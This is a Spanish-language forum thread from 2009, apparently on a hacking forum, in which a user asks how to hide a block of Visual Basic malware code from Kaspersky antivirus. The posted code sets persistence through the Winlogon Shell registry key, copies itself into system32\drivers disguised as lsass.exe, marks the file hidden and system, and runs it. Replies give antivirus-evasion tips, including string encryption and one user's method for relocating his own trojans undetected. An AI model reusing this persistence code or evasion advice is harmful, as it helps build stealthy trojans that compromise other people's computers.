Indetectabilizar unas lineas en vb

Iniciado por demoniox12, 4 Marzo 2009, 15:51 PM

0 Miembros y 2 Visitantes están viendo este tema.

demoniox12

Buenas,

el pedazo de codigo que detecta es:

Código (vb) [Seleccionar]
Reg_Crea_KeyConValor HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe, " & Environ("WinDir") & "\system32\drivers\lsass.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("WinDir") & "\system32\drivers\lsass.exe" 'lo copiamos
SetAttr Environ("WinDir") & "\system32\drivers\lsass.exe", vbHidden + vbReadOnly + vbSystem
DoEvents
Shell Environ("WinDir") & "\system32\drivers\lsass.exe" 'y lo ejecutamos


Les digo las combinaciones que detecta:

cuando FileCopy no esta no lo detecta, cuando reg_crea_keyconvalor y shell no estan tampoco lo detecta, cuando solo le cambio el nombre al FileCopy digamos le cambio el lsass no lo detecta, intente ponerlo en funcion para que saque de ahi el nombre, tambien intente ponerlo con strreverse.. nadap.. alguna solucion?

Saludos!

PD: el Antivirus es el Kaspersky
By Demoniox

Karcrack


Tengu

asi es, deberias buscar en google, una funcion para cifrar strings
Igualmente en este foro recuerdo haer posteado algo asi. dejame ver...

Encuentros por Video y Chat !!

vivachapas

te digo lo q yo hacia en mis troyanos...

para q se copien a otra carpeta.. no usaba filecopy xq tb me lo detectaba... lo habria en una cadena a si mismo.. creaba el archivo en otra carpeta... y cerraba el archivo... luego lo ejecutaba al nuevo archivo.. este esperaba 10 seg a q el otro termine y se cierre.. lo buscaba y lo borraba...

luego para el regedit simplemente encriptaba el texto plano y ya no te lo detecta

SALUDOS

demoniox12

By Demoniox